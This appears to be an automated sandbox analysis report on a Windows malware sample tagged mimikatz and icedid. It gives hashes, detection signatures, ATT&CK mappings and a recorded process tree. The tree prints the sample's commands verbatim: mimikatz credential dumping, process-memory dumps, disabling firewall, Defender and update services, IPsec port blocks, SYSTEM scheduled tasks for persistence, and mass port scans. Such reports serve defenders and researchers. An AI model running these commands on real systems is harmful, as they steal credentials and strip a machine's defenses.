Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
26/03/2024, 07:52
General
-
Target
2024-03-26_f6859fa4491a7bfa9a7bd48392ba9827_hacktools_icedid_mimikatz.exe
-
Size
8.1MB
-
MD5
f6859fa4491a7bfa9a7bd48392ba9827
-
SHA1
9c9a69e4e6e7445f58e75127069d31849ed21bab
-
SHA256
64c99dbd46df4ac4ab09e3b31ab1a9973fd893b828c96b280b09cf843ca1f909
-
SHA512
e75629c920001c6fe7defe897e4d5e5226a264c116b37e921b39779144656ea2529dd4defbbd7ee7f13e1b2cb152835891df7130e6ae42f0dbebde473c8d2cf3
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (27461) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 46 IoCs
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 9 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 30 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 38 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 8 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 47 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\ygpibwsle\dpmaag.exe"C:\Windows\TEMP\ygpibwsle\dpmaag.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-03-26_f6859fa4491a7bfa9a7bd48392ba9827_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-03-26_f6859fa4491a7bfa9a7bd48392ba9827_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\jmbuwtgr\surptll.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\jmbuwtgr\surptll.exeC:\Windows\jmbuwtgr\surptll.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\jmbuwtgr\surptll.exeC:\Windows\jmbuwtgr\surptll.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\cviyskykk\egarjrkei\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\cviyskykk\egarjrkei\wpcap.exeC:\Windows\cviyskykk\egarjrkei\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\cviyskykk\egarjrkei\iiwiycllr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\cviyskykk\egarjrkei\Scant.txt2⤵
-
C:\Windows\cviyskykk\egarjrkei\iiwiycllr.exeC:\Windows\cviyskykk\egarjrkei\iiwiycllr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\cviyskykk\egarjrkei\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\cviyskykk\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\cviyskykk\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\cviyskykk\Corporate\vfshost.exeC:\Windows\cviyskykk\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "umbukgilb" /ru system /tr "cmd /c C:\Windows\ime\surptll.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "umbukgilb" /ru system /tr "cmd /c C:\Windows\ime\surptll.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "wtineylgh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jmbuwtgr\surptll.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "wtineylgh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jmbuwtgr\surptll.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "wugywgtkt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ygpibwsle\dpmaag.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "wugywgtkt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ygpibwsle\dpmaag.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 784 C:\Windows\TEMP\cviyskykk\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 316 C:\Windows\TEMP\cviyskykk\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 1768 C:\Windows\TEMP\cviyskykk\1768.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 2656 C:\Windows\TEMP\cviyskykk\2656.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 2712 C:\Windows\TEMP\cviyskykk\2712.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 2936 C:\Windows\TEMP\cviyskykk\2936.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 3000 C:\Windows\TEMP\cviyskykk\3000.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 3740 C:\Windows\TEMP\cviyskykk\3740.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 3832 C:\Windows\TEMP\cviyskykk\3832.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 3952 C:\Windows\TEMP\cviyskykk\3952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 4040 C:\Windows\TEMP\cviyskykk\4040.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 3160 C:\Windows\TEMP\cviyskykk\3160.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 1740 C:\Windows\TEMP\cviyskykk\1740.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 4920 C:\Windows\TEMP\cviyskykk\4920.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 3096 C:\Windows\TEMP\cviyskykk\3096.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 3148 C:\Windows\TEMP\cviyskykk\3148.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\cviyskykk\egarjrkei\scan.bat2⤵
-
C:\Windows\cviyskykk\egarjrkei\gsylrituu.exegsylrituu.exe TCP 89.149.0.1 89.149.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 1148 C:\Windows\TEMP\cviyskykk\1148.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 5108 C:\Windows\TEMP\cviyskykk\5108.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\cviyskykk\lfimgrlyg.exeC:\Windows\TEMP\cviyskykk\lfimgrlyg.exe -accepteula -mp 552 C:\Windows\TEMP\cviyskykk\552.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\rwzxsq.exeC:\Windows\SysWOW64\rwzxsq.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jmbuwtgr\surptll.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\jmbuwtgr\surptll.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\surptll.exe1⤵
-
C:\Windows\ime\surptll.exeC:\Windows\ime\surptll.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ygpibwsle\dpmaag.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ygpibwsle\dpmaag.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jmbuwtgr\surptll.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\jmbuwtgr\surptll.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\surptll.exe1⤵
-
C:\Windows\ime\surptll.exeC:\Windows\ime\surptll.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ygpibwsle\dpmaag.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ygpibwsle\dpmaag.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.2MB
MD5ab108a4637dd3b3087533cbfb9287bfb
SHA148257ab0fb8c39655011da67bdd28307eab857c7
SHA256acbd7207b73df07e2209574a21648ec9790ed3e816e6dd227c0923495d799b68
SHA5127472f18dd736b50031c8c881461603cb5ae4814ac0faf0a86e599f3b07fc256aa65089132e25f098cf0b13ef44a24c5f283eff62b936f0889efae65c123fcb7a
-
Filesize
5.3MB
MD55a8fe8dd31b62a08fd005a936c735492
SHA1a53af8165029c93735e29e39d9ad5f1f37070498
SHA2569f9e262e80e716a47a764d684388d4bc3feaa9ea28923f408bbdf158eb5190c6
SHA512edcd6aba2c24cefd5e0ebd40dd9f1de2eb315e99b792fcf8f6b1f367425187418048518ba896b5dd4dab04aff83f763699856dcece95c9bb46d6e209d4a286dc
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.0MB
MD5d2910e8cc9afb273a7a2ece17ab7cd39
SHA1ffbfa78530fd111edbb44192c48441d7a46a16c4
SHA25610eee6217254e16af4a1fea764b4f13b3b91279b0a9521e541623862a6536d13
SHA5120bcdf1d87436c90fe574fef2e89ce3e255f7db9ca8ba8a16021fb4f851a8f82b13b22059af857d34a20d411534ff065e4fc342bd69e1d1e1a9d49f49a35dd0dc
-
Filesize
4.3MB
MD5d7a9a887594e8a9ead05d56ae31b32a5
SHA150bfec4d905584e965b760c2a992fa8c5392eeee
SHA2561c93d49a251fd90c6a7284074aeac83e4d70b207fd14e476fff4436efa110b7d
SHA5126fda97a0c141c31647e41375b85a0f9ae84c5afc8845da6fae9588942aec64a9ac2db475ee7f0dfa1c55f2a826be671b360800c6a03e7a00227c2935dfd2057f
-
Filesize
7.7MB
MD569b56a857db1019156ed2bc3fe7dbaa0
SHA13d7a3bbdefb28e8c3c1aed2ecf09646973ed84dc
SHA256668c400a6a3f8c3ad86764e47704e84ccfb859a735ab25a72c7226d706cb4f4d
SHA512cad209b6e867c635c5b53bdb21fe85d628194f50538530018e18cabaae75b05a5029852b9f497ca2f7dab145666bafefb00938afd5e87d83798c64ef7c8d6e80
-
Filesize
4.1MB
MD57c763b204c58f5eec9100f43b635fc07
SHA1f4c93e6368f259acfcd2aa2bfef21a0311f942cf
SHA2569e2925a89d8e19a7f047e8376a0cd92554411a868cce2a566d6a8bf1a65731f2
SHA5127dfaec7ecad4f0dff090615c061836cfe40d001b1515bca78d64271f111c3ea1cc33ccc87f9536df00d2d598ee6474737e640fef1d01c1d99de24be353fbb8e6
-
Filesize
818KB
MD5b8fc0a595254807eee17e90f302e716a
SHA1e72620bb565bfbfa345077b89a962e965439ae14
SHA25660e8cda0828d2a1d045e0b5d3d6487336b3a1d2c7ebfedf24e2c0daa3359c059
SHA512f526e523b622f1db39887c43450553f01d5d49310f0b0aefec6e949c0bfca0411e00d26bc228ea6bfbdcc4a10d85278e17b667087273357d36ca983ea9dd8b13
-
Filesize
2.9MB
MD513f98cec5714e10644b306bf54ae2261
SHA1e30aa4923361acf2a363474b6f7188dd5f1ddbed
SHA256b3b1cf646f1206e3c4c7ab23d78e2ca5936bd0bf3b01c8b69afcd231fbff11d6
SHA5128c633bad1b3857f0c6ba850585968a888fb99218b5ceb6b5a77b98b4ad015bbe0bab87fe535acd88e69024244db6ef890dfecc56c876d37652b6cd27f5fd8f89
-
Filesize
22.7MB
MD50c5c5671674f40c0c74ed34fe98af002
SHA1ea46e51693ecbc6306fdb6b3c303d99d30aa51d9
SHA256555af8dd65629c322cf490c3a4b6dc516890f36759036ad23e5fba6d547ac7ef
SHA512359bcfb5c73a8d41c8291d3c96954a683b1d4bb102591614f60b9e719f4c0ded796afee2dd7a1fde717d3b2b3b50cf5838e48df7ca4a0c2b148fc6412d4e68f1
-
Filesize
1.2MB
MD58b7d2c1d88f251069a5119919815b9c5
SHA126b21d126b564e1cf34c0782618a6e2b8dde3cad
SHA2567ef13495fa4c6ff7fa87ed6e2f4c6cac9255aa2dfc7cd93a74bda3c828f089ae
SHA5123c6fa297e0dd55b76d376d75cd50f456385832b58d90dde2fb078c74dd5bd3f378703b35bc44bb38d654a241d140f66bf5351ce1aa005ae3639210b868418a75
-
Filesize
2.8MB
MD569d7f836293f92d9865d6081343f6bbc
SHA1306022fc25bbe37cb6c722c94ea899ebd8da7879
SHA256cc3d77feee5f55811d5ab453acdfbf8ed9f0c1f7b713d120ba93efc8e629a1be
SHA512efe3bd760840ad0afaf7eba429d8ea45f921900fb2694bdcbb6e683c6b59c99318b9be9bc454fbe1e5d5ede46871d4abbfb98cf6fdc06007517e0d362a192e1b
-
Filesize
21.2MB
MD567bdf584ecbdca0879248ee0d8de301b
SHA14ef640fea5ab6d4b2db92a6f51911afc8c2dcae1
SHA2563aa3fb1b02595775ed9c77699f0a7a23c49929e91d877803f3c941f2a89e64ec
SHA5121bfa3b65490717b6a05b5aed71e92cd4168ba234283327042caa6681647a62b92d6cc124f8f3c867c49d12ab87e938c045ca1f077001ab4a34baaee0e35162ba
-
Filesize
10.2MB
MD536489bb490c094a0a3eed977a8bd7db3
